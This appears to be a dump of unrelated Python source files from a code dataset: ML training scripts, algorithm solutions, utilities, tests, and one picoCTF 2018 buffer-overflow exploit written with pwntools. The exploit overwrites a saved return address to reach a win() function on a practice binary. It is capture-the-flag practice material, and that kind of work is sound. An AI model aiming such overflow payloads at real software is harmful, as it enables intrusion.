        session_factory = self.replay_flight_data('test_elasticache_snapshot')
        p = self.load_policy({
            'name': 'elasticache-snapshot',
            'resource': 'cache-snapshot'},
            session_factory=session_factory)
        resources = p.run()
        self.assertEqual(len(resources), 3)

    def test_elasticache_snapshot_age_filter(self):
        # All 3 recorded snapshots are older than 2 days.
        factory = self.replay_flight_data('test_elasticache_snapshot')
        p = self.load_policy({
            'name': 'elasticache-snapshot-age-filter',
            'resource': 'cache-snapshot',
            'filters': [{'type': 'age', 'days': 2}]},
            session_factory=factory)
        resources = p.run()
        self.assertEqual(len(resources), 3)

    def test_elasticache_snapshot_delete(self):
        factory = self.replay_flight_data('test_elasticache_snapshot_delete')
        p = self.load_policy({
            'name': 'elasticache-snapshot-delete',
            'resource': 'cache-snapshot',
            'actions': ['delete']},
            session_factory=factory)
        resources = p.run()
        self.assertEqual(len(resources), 3)
24,646 | 89665ebedd149ebe10feb354fd61dcbba1b1d2a6 | # 在天之靈保佑 順利跑出結果
import logging
import fastText
import random
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from sklearn.cross_validation import train_test_split
def print_results(N, p, r):
    """Print a fastText-style evaluation summary.

    N is the number of evaluated samples, p and r are precision@1 and
    recall@1; both are shown with three decimals.
    """
    print("N\t{}".format(N))
    print("P@{}\t{:.3f}".format(1, p))
    print("R@{}\t{:.3f}".format(1, r))
def build_dataset(i_no):
    """Split train_ft.txt (tab-separated "text\\tlabel" lines) 80/20 and
    write train_ft_<i_no>.txt / test_ft_<i_no>.txt in the same format."""
    text_data = []
    label_data = []
    with open("train_ft.txt", "r", encoding='utf-8') as readfile:
        while True:
            line = readfile.readline().strip()
            if not line:
                # Stops at the first blank line (or EOF, where readline
                # returns "").
                break
            pass
            (text, label_fine) = line.split("\t")
            text_data.append(text)
            label_data.append(label_fine)
    # Random 80/20 split (not stratified).
    x_train, x_test, y_train, y_test = train_test_split(text_data, label_data, test_size=0.2)
    train_data = []
    for index in range(len(x_train)):
        tmp = str(x_train[index]) + "\t" + str(y_train[index]) + "\n"
        train_data.append(tmp)
    with open("train_ft_" + str(i_no) + ".txt", "w", encoding='utf-8') as file_to_write:
        for index in train_data:
            file_to_write.write(index)
    test_data = []
    for index in range(len(x_test)):
        tmp = str(x_test[index]) + "\t" + str(y_test[index]) + "\n"
        test_data.append(tmp)
    with open("test_ft_" + str(i_no) + ".txt", "w", encoding='utf-8') as file_to_write:
        for index in test_data:
            file_to_write.write(index)
    return
def build_dataset_cross():
    """Shuffle train_p4.txt and write 5 cross-validation folds:
    train_p4_<i>.txt / test_p4_<i>.txt, each test fold = 24000 lines.

    NOTE(review): assumes the file has exactly 120000 usable lines
    (5 folds x 24000) — confirm against the data.
    """
    text_data = []
    label_data = []  # NOTE(review): unused here — leftover from build_dataset
    with open("train_p4.txt", "r", encoding='utf-8') as readfile:
        while True:
            line = readfile.readline().strip()
            if not line:
                break
            pass
            text_data.append(line)
    random.shuffle(text_data)
    ran = 0  # start offset of the current test fold
    for i in range(5):
        train_data = []
        test_data = []
        # Lines before the fold go to train...
        if ran > 0:
            for index in range(ran):
                tmp = str(text_data[index]) + "\n"
                train_data.append(tmp)
        # ...the fold itself to test...
        for index in range(ran, int(ran + 24000)):
            tmp = str(text_data[index]) + "\n"
            test_data.append(tmp)
        # ...and the remainder back to train.
        for index in range(int(ran + 24000), 120000):
            tmp = str(text_data[index]) + "\n"
            train_data.append(tmp)
        with open("train_p4_" + str(i) + ".txt", "w", encoding='utf-8') as file_to_write:
            for index in train_data:
                file_to_write.write(index)
        with open("test_p4_" + str(i) + ".txt", "w", encoding='utf-8') as file_to_write:
            for index in test_data:
                file_to_write.write(index)
        ran += 24000
    return
def get_dataset():
    """Split train_ft.txt 80/20 and write train_ft_1.txt / test_ft_1.txt.

    Kept for backward compatibility: the previous body was a line-for-line
    copy of build_dataset with the file suffix hard-coded to 1, so it now
    simply delegates to build_dataset(1).
    """
    return build_dataset(1)
def train(i_no, dim, epoch, minCount, wordNgrams):
    """Train a supervised fastText classifier (softmax loss) on
    data/train_p3_<i_no>.txt and return the trained model."""
    train_data = "data/train_p3_" + str(i_no) + ".txt"
    # train_data = "data/train_p_t_1.txt"
    model = fastText.train_supervised(input=train_data, label="__label__", dim=dim, epoch=epoch, minCount=minCount,
                                      wordNgrams=wordNgrams, loss="softmax")
    return model
def classifier(model, i_no):
    """Print fastText's built-in N / P@1 / R@1 on data/test_ft_<i_no>.txt."""
    test_data = "data/test_ft_" + str(i_no) + ".txt"
    print_results(*model.test(test_data))
    return
def classifier_1(model_name, i_no):
    """Evaluate *model_name* on data/test_p3_<i_no>.txt and return
    (macro precision, macro recall, weighted F1).

    NOTE(review): the hard-coded divisors below assume a 24000-line test
    fold (matches build_dataset_cross) and 8 classes — confirm both.
    """
    test_file = "data/test_p3_" + str(i_no) + ".txt"
    model = fastText.load_model(model_name)
    r_text = []
    r_label = []
    with open(test_file, "r", encoding='utf-8') as readfile:
        while True:
            line = readfile.readline().strip()
            if not line:
                break
            pass
            (text, label_fine) = line.split("\t")
            r_text.append(text)
            # label_fine.replace("__label__", "")
            r_label.append(label_fine)
    # print(model.predict(r_text))
    # print("test file loadin success")
    # Top-1 predicted label for each test sentence.
    p_label = [item[0] for item in model.predict(r_text)[0]]
    print("get predict result success")
    r_label_class = list(set(r_label))
    p_label_class = list(set(p_label))
    right_no = dict.fromkeys(r_label_class, 0)    # correct predictions per class
    real_no = dict.fromkeys(r_label_class, 0)     # ground-truth count per class
    predict_no = dict.fromkeys(p_label_class, 0)  # predicted count per class
    # print(right_no.keys())
    # print(real_no.keys())
    # print(predict_no.keys())
    for i in range(len(r_label)):
        real_no[r_label[i]] += 1
        predict_no[p_label[i]] += 1
        if r_label[i] == p_label[i]:
            right_no[r_label[i]] += 1
    # print(right_no)
    # print(real_no)
    print(predict_no)
    f1_score = 0.0
    r_no = re_no = p_no = 0.0
    for key in right_no:
        r_no += right_no[key]
    for key in real_no:
        re_no += real_no[key]
    for key in predict_no:
        p_no += predict_no[key]
    all_p = 0.0
    all_r = 0.0
    for key in real_no:
        try:
            # Per-class precision/recall; a class absent from one side is
            # scored as 1.0 to avoid division by zero.
            if real_no[key] == 0:
                r = 1.0
            else:
                r = float(right_no[key]) / float(real_no[key])
            if predict_no[key] == 0:
                p = 1.0
            else:
                p = float(right_no[key]) / float(predict_no[key])
            all_p += p
            all_r += r
            f = p * r * 2 / (p + r)
            # print("%s:\t p:%f\t r:%f\t f:%f" % (key, p, r, f))
            f1_score += f * float(real_no[key])
        except:
            # NOTE(review): bare except — a class predicted but never seen in
            # the ground truth raises KeyError in predict_no and lands here.
            print("error:", key, "right:", right_no.get(key, 0), "real:", real_no.get(key, 0), "predict:",
                  predict_no.get(key, 0))
    f1_score = f1_score / 24000.0  # weighted by class support / fold size
    all_p /= 8.0                   # macro average over 8 classes (see docstring)
    all_r /= 8.0
    print("Precise:" + str(all_p))
    print("Recall: " + str(all_r))
    print("Macro_Average_F1_Score:" + str(f1_score))
    return all_p, all_r, f1_score
if __name__ == "__main__":
    # 5-fold cross-validation: train one model per fold, evaluate it,
    # and average precision/recall/F1 across the folds.
    # build_dataset_cross()
    F1_score = 0.00
    Precise = 0.00
    Recall = 0.00
    for index in range(5):
        print("Model" + str(index) + ":")
        dim = 150
        epoch = 5
        minCount = 1
        wordNgrams = 1
        # build_dataset(index)
        # (disabled) rebuild the dataset split
        # get_dataset()
        # print("DataSet Build Success")
        # Train the fold's model.
        model = train(index, dim, epoch, minCount, wordNgrams)
        # print("Model Training Success")
        # Persist the model.
        model_name = "model/ft_thu_model_1_" + str(index) + ".bin"
        model.save_model(model_name)
        # print("Save model success")
        # Evaluate on the fold's held-out data.
        # classifier(model)
        (allp, allr, fscore) = classifier_1(model_name, index)
        Precise += allp
        Recall += allr
        F1_score += fscore
    Precise /= 5
    Recall /= 5
    print("Precise:" + str(Precise))
    print("Recall: " + str(Recall))
    print("5_fold_corss_validation result:")
    F1_score /= 5
    print(F1_score)
24,647 | 45e8493907ead5921a7a6ffd8ebd77ed79865202 | # coding=utf-8
# https://www.acmicpc.net/problem/2504
# 4개의 기호 ‘(’, ‘)’, ‘[’, ‘]’를 이용해서 만들어지는 괄호열 중에서 올바른 괄호열이란 다음과 같이 정의된다.
# 한 쌍의 괄호로만 이루어진 ‘()’와 ‘[]’는 올바른 괄호열이다.
# 만일 X가 올바른 괄호열이면 ‘(X)’이나 ‘[X]’도 모두 올바른 괄호열이 된다.
# X와 Y 모두 올바른 괄호열이라면 이들을 결합한 XY도 올바른 괄호열이 된다.
# 예를 들어 ‘(()[[]])’나 ‘(())[][]’ 는 올바른 괄호열이지만 ‘([)]’ 나 ‘(()()[]’ 은 모두 올바른 괄호열이 아니다.
# 우리는 어떤 올바른 괄호열 X에 대하여 그 괄호열의 값(괄호값)을 아래와 같이 정의하고 값(X)로 표시한다.
# ‘()’ 인 괄호열의 값은 2이다.
# ‘[]’ 인 괄호열의 값은 3이다.
# ‘(X)’ 의 괄호값은 2×값(X) 으로 계산된다.
# ‘[X]’ 의 괄호값은 3×값(X) 으로 계산된다.
# 올바른 괄호열 X와 Y가 결합된 XY의 괄호값은 값(XY)= 값(X)+값(Y) 로 계산된다.
# 예를 들어 ‘(()[[]])([])’ 의 괄호값을 구해보자. ‘()[[]]’ 의 괄호값이 2 + 3×3=11 이므로 ‘(()[[ ]])’의 괄호값은 2×11=22 이다. 그리고 ‘([])’의 값은 2×3=6 이므로 전체 괄호열의 값은 22 + 6 = 28 이다.
# 여러분이 풀어야 할 문제는 주어진 괄호열을 읽고 그 괄호값을 앞에서 정의한대로 계산하여 출력하는 것이다.
# 입력
# 첫째 줄에 괄호열을 나타내는 문자열(스트링)이 주어진다. 단 그 길이는 1 이상, 30 이하이다.
# 출력
# 첫째 줄에 그 괄호열의 값을 나타내는 정수를 출력한다. 만일 입력이 올바르지 못한 괄호열이면 반드시 0을 출력해야 한다.
def bracket_value(s):
    """Return the value of bracket string *s* per BOJ 2504, or 0 if invalid.

    Rules: '()' = 2, '[]' = 3, '(X)' = 2*X, '[X]' = 3*X, XY = X + Y.
    A single stack holds opening brackets and partial integer values.
    (Refactor: the former top-level script relied on sum() raising
    TypeError on leftover openers; that case is now checked explicitly,
    and reading stdin moved under a __main__ guard.)
    """
    openers = ['(', '[']
    closers = [')', ']']
    stack = []
    for ch in s:
        if ch in openers:
            stack.append(ch)
            continue
        # Closing bracket: pop accumulated partial values until the
        # matching opener, then push the combined value.
        partial = 0
        while True:
            if not stack:
                return 0  # closer with no opener
            top = stack.pop()
            if top in openers:
                break
            partial += top  # top is an int partial value
        if closers.index(ch) != openers.index(top):
            return 0  # mismatched bracket types, e.g. '([)]'
        if partial == 0:
            partial = 1  # empty pair counts as 1 before scaling
        stack.append(partial * (closers.index(ch) + 2))  # ')' -> *2, ']' -> *3
    # Leftover openers mean the string never closed -> invalid.
    if any(isinstance(v, str) for v in stack):
        return 0
    return sum(stack)


if __name__ == "__main__":
    # Read one bracket string and print its value (0 when malformed).
    print(bracket_value(input()))
|
24,648 | be9063705359508c84f9affc78963b2d1eb78956 | #!/usr/bin/env python
from pwn import *
import sys
# picoCTF 2018 buffer-overflow-1 exploit: overwrite the saved return
# address with the address of win().
argv = len(sys.argv)
#get win_addr from the binary's symbol table
e = ELF('./vuln')
win = e.symbols['win']
#start process locally or remotely based on args given
if argv > 1:
    from getpass import getpass
    # NOTE(review): this rebinds pwntools' ssh() helper name to the
    # connection object — works once, but shadows the function.
    ssh = ssh(host='2018shell.picoctf.com', user='ems3t', password=getpass())
    p = ssh.process('vuln', cwd='/problems/buffer-overflow-1_0_787812af44ed1f8151c893455eb1a613')
else:
    p = process('./vuln')
'''
pwn cyclic 50 | strace ./vuln
pwn cyclic -l 0x6161616c
44
'''
#set buf amount: offset to the saved EIP, found with the cyclic pattern above
buf = 44
#build payload: 44 filler bytes, then win()'s packed 32-bit address
payload = ''
payload+= 'A'*buf
payload+=p32(win)
#send exploit and start interactive mode
p.sendline(payload)
p.interactive()
24,649 | a2bcd90fc9dd0a5a8cd0d61f8d39ec39af9d5b56 | import json
import glob
import os
import ArgParser as ap
class TextSweeper(object):
    '''
    Class for replacing text in text files in different ways.
    Input:
        scandict (dictionary)
            Dictionary used to inform what text to replace in files.
            If any key is found in a text file, it is replaced with the
            value.
    '''
    def __init__(self, scandict=None):
        if scandict is not None:
            self.scandict = scandict

    def OpenJSON(self, loc):
        '''Load the substitution dictionary from the JSON file at path *loc*.'''
        # BUG FIX: json.load() takes the open file object, not the path
        # string — the previous code passed *loc* itself and raised
        # AttributeError on every call.
        with open(loc, "r") as f:
            self.scandict = json.load(f)
        print("SCANDICT IS: " + str(self.scandict))

    def ReplaceInFile(self, infile, outfile):
        '''Given an input file, open the file and replace any keys in
        the scandict object with their values. Save to output file location.'''
        with open(infile, "r") as f:
            oldfile = f.readlines()
        newfile = []
        for l in oldfile:
            for key in self.scandict:
                # str.replace is a no-op when the key is absent, so no
                # separate find() check is needed.
                l = l.replace(key, self.scandict[key])
            newfile.append(l)
        with open(outfile, "w") as f:
            for line in newfile:
                f.write(line)

    def ReplaceInDirectoryFiles(self, infiledir, outfiledir):
        '''Given an input directory, scan all files in the directory for
        keys in the scandict, and replace with values. Save the files to
        the outfiledir'''
        if not os.path.exists(outfiledir):
            os.mkdir(outfiledir)
        infiles = glob.glob("%s/*" % (infiledir))
        if ap.args.DEBUG:
            print("INFILEDIR: %s" % (infiledir))
        for fi in infiles:
            infiletail = fi.replace(infiledir, "")
            if ap.args.DEBUG:
                print("INFILETAIL: %s" % (infiletail))
            self.ReplaceInFile(fi, "%s/%s" % (outfiledir, infiletail))
|
24,650 | 7c0bbf39d415a0ff911fe920a2322efb879dfbd8 | import math
import sys
import psutil
import os
from os import path, write
from file_utils import *
# Cap the in-memory line set at 5% of currently-free RAM.
amount_of_ram_to_be_used = (psutil.virtual_memory().free * 0.05)
dupe_loc = set()          # 1-based line numbers identified as duplicates
curr_set = set()          # lines currently held in memory for comparison
dupe_count = 0            # running total of duplicate lines found
total_lines = 0           # line count of the input file
fill_set_line_count = 0   # cursor used while filling curr_set
offset_by = 0             # leading lines already covered by earlier passes
leftover = 0              # lines not yet covered by a fill_set pass
def get_total_lines(filename):
    """Count lines in *filename* (via file_utils.get_line_count) and seed
    the total_lines / leftover globals."""
    global total_lines
    global leftover
    total_lines = get_line_count(filename)
    print("# of lines in file:", total_lines)
    leftover = total_lines
def fill_set(file_input):
    """One dedupe pass: fill curr_set with unseen lines (up to the RAM cap)
    starting at offset_by, recording duplicate line numbers in dupe_loc,
    then compare the rest of the file against the set."""
    global fill_set_line_count
    global dupe_count
    global offset_by
    global leftover
    fill_set_dupe_count = 0
    with open(file_input, 'r') as input:
        for line in input:
            # NOTE(review): set.__sizeof__() is the shallow container size
            # only (excludes the stored strings), so the memory cap is a
            # large underestimate — confirm intent.
            if curr_set.__sizeof__() < amount_of_ram_to_be_used:
                fill_set_line_count += 1
                if fill_set_line_count > offset_by:
                    if fill_set_line_count in dupe_loc:
                        continue  # already known duplicate
                    if line in curr_set:
                        dupe_loc.add(fill_set_line_count)
                        fill_set_dupe_count += 1
                    else:
                        curr_set.add(line)
    print("# of dupes while filling set:", fill_set_dupe_count)
    dupe_count += fill_set_dupe_count
    # Next pass resumes after the lines consumed into curr_set.
    offset_by = fill_set_line_count
    fill_set_line_count = 0
    leftover = total_lines - offset_by
    print("leftover:", leftover)
    compare_to_file(file_input)
def compare_to_file(file_input):
    """Scan the lines after offset_by against curr_set, marking any matches
    as duplicates in dupe_loc, then release the set."""
    with open(file_input, 'r') as input:
        global dupe_count
        counter = 0
        line_count = 0
        for line in input:
            line_count += 1
            if line_count > offset_by:
                if line_count in dupe_loc:
                    continue  # already recorded
                if line in curr_set:
                    dupe_loc.add(line_count)
                    counter += 1
    print("# of dupes in rest of file that is contained in current set", counter)
    dupe_count += counter
    print("current # of duplicates found", dupe_count)
    curr_set.clear()
# Pretty much unused/ slower than just writing to a new file
def removeLineHelper(file_input, line_selection):
    """Delete line *line_selection* (0-based) from *file_input* in place by
    shifting the remainder of the file back over it.  O(file size) per
    removal — kept only for reference (see comment above)."""
    fro = open(file_input, "r")
    current_line = 0
    while current_line < line_selection:
        fro.readline()
        current_line += 1
    # Position where the doomed line starts.
    seekpoint = fro.tell()
    frw = open(file_input, "r+")
    frw.seek(seekpoint, 0)
    # read the line we want to discard
    fro.readline()
    # now move the rest of the lines in the file
    # one line back
    chars = fro.readline()
    while chars:
        frw.writelines(chars)
        chars = fro.readline()
    fro.close()
    frw.truncate()
    frw.close()
def writeFile(filename, output):
    """Copy *filename* to *output*, skipping every line whose 1-based
    number is recorded in the global dupe_loc set."""
    line_count = 0
    with open(filename, 'r') as readfile:
        with open(output, 'w') as writefile:
            for line in readfile:
                line_count += 1
                if line_count in dupe_loc:
                    continue
                else:
                    writefile.writelines(line)
# Counter starts at 1 since the first line in the text file is line 0
# counter is then incremented for each removal in the array of duplicates
def delete_lines(filename):
    """(Legacy, unused by main) iterate the recorded duplicate line numbers
    in order, then clear them.  *filename* is accepted for interface
    compatibility but unused."""
    # BUG FIX: dupe_loc is a set and has no .sort() method — the previous
    # dupe_loc.sort() raised AttributeError.  Iterate a sorted copy instead.
    counter = 1
    for x in sorted(dupe_loc):
        counter += 1
    dupe_loc.clear()
def main(filename, output):
add_newline_if_missing(filename)
get_total_lines(filename)
while(leftover != 0):
fill_set(filename)
if offset_by == total_lines:
break
writeFile(filename, output)
print("total dupes", dupe_count) |
24,651 | 3b8a158fa713102efaf05aa4ff78f70ff8f9c334 | # Generated by Django 3.0.5 on 2020-04-25 15:27
from django.db import migrations
class Migration(migrations.Migration):
    """Drops the Manager model (follows 0011_delete_user)."""

    dependencies = [
        ('apis', '0011_delete_user'),
    ]

    operations = [
        migrations.DeleteModel(
            name='Manager',
        ),
    ]
|
24,652 | 607868d43ac983ae30db9ba236ba3c2cfdc34c0e | import pytest
from MobileApps.libs.flows.ios.jweb_data_collection.flow_container import FlowContainer
@pytest.fixture(scope="session", autouse=True)
def ios_jweb_data_collection_setup(request, session_setup):
    """
    Session-wide setup for the iOS JWeb Data Collection tests:
    - reuses the driver instance created by the session_setup fixture
    - wraps it in a FlowContainer
    - returns the (driver, flow_container) pair to each test
    """
    driver = session_setup
    fc = FlowContainer(driver)
    return driver, fc
24,653 | f56f8efb6386b2b3f3b291eda3b1334a41fc522a | # If needed, you can define your own additional functions here.
# Start of your additional functions.
# End of your additional functions.
def convert_to_list(num_list_str):
    """Convert *num_list_str* into a list (exercise stub).

    TODO: intentionally unimplemented template — currently always returns
    an empty list.  The expected parsing rule is defined by the exercise
    and is not visible in this file.
    """
    # Modify the code below
    return []
24,654 | ad2028480f6757a87920b7d12e4fa1d2f86d18a0 | """
将两个有序链表合并为一个新的有序链表并返回。新链表是通过拼接给定的两个链表的所有节点组成的。
示例:
输入:1->2->4, 1->3->4
输出:1->1->2->3->4->4
方法 1:递归
想法
我们可以如下递归地定义在两个链表里的 merge 操作(忽略边界情况,比如空链表等):
    merge(list1, list2) =
        list1[0] + merge(list1[1:], list2)    当 list1[0] < list2[0]
        list2[0] + merge(list1, list2[1:])    otherwise
算法
我们直接将以上递归过程建模,首先考虑边界情况。
特殊的,如果 l1 或者 l2 一开始就是 null ,那么没有任何操作需要合并,所以我们只需要返回非空链表。否则,我们要判断 l1 和 l2 哪一个的头元素更小,然后递归地决定下一个添加到结果里的值。如果两个链表都是空的,那么过程终止,所以递归过程最终一定会终止。
方法 2:迭代
想法
我们可以用迭代的方法来实现上述算法。我们假设 l1 元素严格比 l2元素少,我们可以将 l2 中的元素逐一插入 l1 中正确的位置。
算法
首先,我们设定一个哨兵节点 "prehead" ,这可以在最后让我们比较容易地返回合并后的链表。我们维护一个 prev 指针,我们需要做的是调整它的 next 指针。然后,我们重复以下过程,直到 l1 或者 l2 指向了 null :如果 l1 当前位置的值小于等于 l2 ,我们就把 l1 的值接在 prev 节点的后面同时将 l1 指针往后移一个。否则,我们对 l2 做同样的操作。不管我们将哪一个元素接在了后面,我们都把 prev 向后移一个元素。
在循环终止的时候, l1 和 l2 至多有一个是非空的。由于输入的两个链表都是有序的,所以不管哪个链表是非空的,它包含的所有元素都比前面已经合并链表中的所有元素都要大。这意味着我们只需要简单地将非空链表接在合并链表的后面,并返回合并链表。
"""
# definition for singly-linked list
class ListNode:
    # Singly-linked list node: a value plus a pointer to the successor.
    def __init__(self, x):
        self.val = x       # payload
        self.next = None   # next node, or None at the tail
class Solution1:
    """Recursive merge of two sorted linked lists."""

    def mergeTwoLists(self, l1, l2):
        """Return the head of the merged, sorted list.

        The smaller current head becomes the result head; its tail is the
        recursive merge of the remaining nodes.  On equal values the node
        from l2 is taken first (matching the original ordering).
        """
        # Base cases: one list exhausted -> the other is the answer.
        if l1 is None:
            return l2
        if l2 is None:
            return l1
        if l1.val < l2.val:
            smaller, rest_a, rest_b = l1, l1.next, l2
        else:
            smaller, rest_a, rest_b = l2, l1, l2.next
        smaller.next = self.mergeTwoLists(rest_a, rest_b)
        return smaller
class Solution2:
    """Iterative merge of two sorted linked lists."""

    def mergeTwoLists(self, l1, l2):
        """Return the head of the merged, sorted list.

        A sentinel (dummy head) node avoids special-casing the first
        append; *tail* always points at the last merged node.  On equal
        values the node from l2 is taken first.
        """
        sentinel = ListNode(-1)
        tail = sentinel
        while l1 and l2:
            if l1.val < l2.val:
                tail.next, l1 = l1, l1.next
            else:
                tail.next, l2 = l2, l2.next
            tail = tail.next
        # At most one list is non-empty here; splice the remainder on.
        tail.next = l1 if l1 is not None else l2
        return sentinel.next
|
24,655 | 575a392af428915a222e16ed34b51487e97292d2 | import cv2
import numpy as np
import os
import pickle
#import matplotlib.pyplot as plt
from mtcnn.mtcnn import MTCNN
from sklearn.preprocessing import LabelEncoder
#from keras.utils import to_categorical
import random
import argparse
from tqdm import tqdm
# CLI options: raw per-person image folders, destination for cropped
# faces, and destination for the pickled arrays.
parser = argparse.ArgumentParser()
parser.add_argument('--image_path', type=str, default='./FaceData',
                    help='Path to the directory containing people data.')
parser.add_argument('--output_face', type=str, default='./faceimg',
                    help='Path to the directory to save Face_Image.')
parser.add_argument('--output_data', type=str, default='./dataset',
                    help='Path to the directory to create Pickle outputs.')
IMG_SIZE = 224  # square face-crop edge length in pixels
def pickle_data(filename, data):
    """Serialize *data* to *filename* with pickle.

    Uses a context manager so the file is closed even if pickling raises
    (the previous open/dump/close sequence leaked the handle on error).
    """
    with open(filename, "wb") as saved_data:
        pickle.dump(data, saved_data)
def extract_face(image, required_size=(224, 224)):
    """Detect all faces in *image* with MTCNN and return the crops resized
    to *required_size* (empty list when nothing is detected)."""
    faces = []
    # NOTE(review): constructing MTCNN() on every call reloads the detector
    # weights each time — consider hoisting to module level.
    detector = MTCNN()
    face_coords = detector.detect_faces(image)
    for face_coord in face_coords:
        x, y, w, h = face_coord['box']
        face = image[y:y+h, x:x+w]
        if face.shape[0] > 0 and face.shape[1] > 0:
            # NOTE(review): comparing the (h, w, 3) shape tuple to the 2-tuple
            # required_size is lexicographic, not element-wise; it only picks
            # the interpolation mode (AREA for smaller crops, CUBIC otherwise)
            # — confirm this is intended.
            if face.shape < required_size:
                face = cv2.resize(face, required_size,
                                  interpolation=cv2.INTER_AREA)
            else:
                face = cv2.resize(face, required_size,
                                  interpolation=cv2.INTER_CUBIC)
            faces.append(face)
    return faces
def gen_dataset(image_path):
    """Detect faces in every image under *image_path*/<person>/ and save
    the crops to faceimg/<person>/<n>.jpeg.

    Fixes vs. the previous version:
    - the *image_path* parameter was immediately overwritten by a
      hard-coded 'FaceData/', defeating the --image_path CLI option;
    - the cropped face was never written to disk (filedir was computed
      but unused), so collect_dataset() later found empty directories.
    """
    print('Extracting faces from dataset')
    labels_dic = {}
    people = [person for person in os.listdir(image_path)]
    count = 0
    for i, person in enumerate(people):
        labels_dic[i] = person
        person_dir = 'faceimg/{}'.format(person)
        if not os.path.isdir(person_dir):
            os.mkdir(person_dir)
        print('Extracting {} face'.format(person))
        for image in tqdm(os.listdir(os.path.join(image_path, person))):
            # NOTE(review): cv2.imread's 2nd argument should be an IMREAD_*
            # flag; cv2.COLOR_BGR2RGB is a color-conversion code — kept as in
            # the original (collect_dataset uses the same call), but confirm.
            img = cv2.imread(os.path.join(os.path.join(image_path, person), image), cv2.COLOR_BGR2RGB)
            faces = extract_face(img, (IMG_SIZE, IMG_SIZE))
            for face in faces:
                filedir = 'faceimg/{}/{}.jpeg'.format(person, count)
                cv2.imwrite(filedir, face)  # was missing: persist the crop
                count += 1
def collect_dataset(output_face):
    """Load every cropped face image under *output_face*/<person>/ and
    return (face_images, labels array, {index: person} dictionary)."""
    print('Collecting faces')
    face_images = []
    labels = []
    labels_dic = {}
    path = output_face
    people = [person for person in os.listdir(path)]
    for i, person in enumerate(tqdm(people)):
        labels_dic[i] = person
        imagedir = os.path.join(path, person)
        for image in os.listdir(imagedir):
            img = cv2.imread(os.path.join(imagedir, image), cv2.COLOR_BGR2RGB)
            face_images.append(img)
            labels.append(person)
    return (face_images, np.array(labels), labels_dic)
def main(args):
    """Build the pickled training set: cut faces, shuffle, serialize.

    Writes X.pickle, y.pickle and dict.pickle into args.output_data.
    """
    #Comment this line if you've already got cutted face images.
    gen_dataset(args.image_path)
    face_images, labels, labels_dic = collect_dataset(args.output_face)
    # Encode the person names as integer class labels.
    encoder = LabelEncoder()
    encoder.fit(labels)
    encoded_labels = encoder.transform(labels)
    #encoded_labels = to_categorical(encoded_labels)
    # Shuffle images and labels together so the pairs stay aligned.
    zipped_object = list(zip(face_images, encoded_labels))
    random.shuffle(zipped_object)
    X, y = zip(*zipped_object)
    X = np.asarray(X)
    y = np.asarray(y)
    # ndarray.reshape returns a new array; the original discarded the
    # result, so the reshape silently had no effect.
    X = X.reshape(-1, IMG_SIZE, IMG_SIZE, 3)
    pickle_data(os.path.join(args.output_data, 'X.pickle'), X)
    pickle_data(os.path.join(args.output_data, 'y.pickle'), y)
    pickle_data(os.path.join(args.output_data, 'dict.pickle'), labels_dic)
if __name__ == '__main__':
FLAGS, unparsed = parser.parse_known_args()
main(FLAGS) |
24,656 | 6582fdabcabd53d913ae70b4332429b97d5d75aa | import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.base import TransformerMixin
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_absolute_error
from sklearn.model_selection import train_test_split
class FeatureExtractor(TransformerMixin):
    """Label-encode every categorical ('cat*') column of the claims data.

    Fit on the concatenation of the train and test frames so the
    encoders see every category appearing in either set.
    """

    def fit(self, df_1, df_2):
        """Learn one LabelEncoder per 'cat*' column from both frames."""
        df = pd.concat([df_1, df_2], axis=0)
        self.cat_columns = [col for col in df.columns if col[:3] == 'cat']
        self.le_dict = {}
        for col in self.cat_columns:
            self.le_dict[col] = LabelEncoder().fit(df[col])
        return self

    def transform(self, df):
        """Return a copy of `df` with 'id' dropped and categoricals encoded."""
        # drop() already returns a new frame; the original's explicit
        # copy() + inplace drop with a *positional* axis argument is
        # redundant, and positional axis was removed in pandas 2.x.
        df = df.drop(columns=['id'])
        for col in self.cat_columns:
            df[col] = self.le_dict[col].transform(df[col])
        return df
def target_transform(y, mu=200):
    """Shifted-log transform of the loss target: log(y + mu)."""
    shifted = y + mu
    return np.log(shifted)
def target_inverse_transform(y_tr, mu=200):
    """Inverse of target_transform: exp, then remove the shift."""
    unshifted = np.exp(y_tr)
    return unshifted - mu
def get_submission(y_sub):
    """Wrap predictions into a Kaggle submission frame (id, loss).

    NOTE(review): reads the module-level ``df_test`` created in the
    ``__main__`` block below -- only callable after that frame exists.
    """
    df_sub = df_test[['id']].copy()
    df_sub['loss'] = y_sub
    return df_sub
if __name__ == "__main__":
# Read and preprocess data
df = pd.read_csv('../raw_data/train.csv')
df_test = pd.read_csv('../raw_data/test.csv')
X = df.drop(['loss'], 1)
y = df.loss
X_test = df_test
fe = FeatureExtractor().fit(X, X_test)
X_tr = fe.transform(X)
X_test = fe.transform(df_test)
X_train, X_val, y_train, y_val = train_test_split(X_tr, y, test_size=0.2, random_state=2016)
dtrain = xgb.DMatrix(X_train, target_transform(y_train))
dtrain_full = xgb.DMatrix(X_tr, target_transform(y))
dval = xgb.DMatrix(X_val, target_transform(y_val))
dtest = xgb.DMatrix(X_test)
watchlist = [(dval, 'val')]
params = {
'alpha': 2.8057319601765127,
'colsample_bytree': 0.46,
'max_depth': 13,
'gamma': 0.9945292474298767,
'subsample': 0.9,
'eta': 0.001,
'seed': 2016,
'min_child_weight': 1,
'objective': 'reg:linear',
'eval_metric': 'mae',
'silent': 1,
'nthread': 4
}
num_boost_round = 100000
xgbm = xgb.train(
params, dtrain, num_boost_round,
evals=watchlist, early_stopping_rounds=50,
verbose_eval=False)
best_iter = xgbm.best_iteration
y_pred = target_inverse_transform(xgbm.predict(dval))
mae = mean_absolute_error(y_val, y_pred)
print 'MAE = {:.2f}'.format(mae)
num_boost_round = best_iter
xgbm = xgb.train(params, dtrain_full, num_boost_round)
y_pred = target_inverse_transform(xgbm.predict(dtest))
submission = get_submission(y_pred)
submission.to_csv('../submissions/11_25_1.csv', index=False)
|
24,657 | 30c38b24dcee1e2148ca1304057eef99a151a77d | from flask import Flask, request, render_template
from chatterbot import ChatBot
from chatterbot.trainers import ChatterBotCorpusTrainer
from chatterbot.trainers import ListTrainer
app = Flask(__name__)
# ChatterBot instance backed by a local SQLite database; only the
# mathematical-evaluation and time logic adapters are enabled.
bot = ChatBot(
    'Hedwig',
    storage_adapter='chatterbot.storage.SQLStorageAdapter',
    logic_adapters=[
        'chatterbot.logic.MathematicalEvaluation',
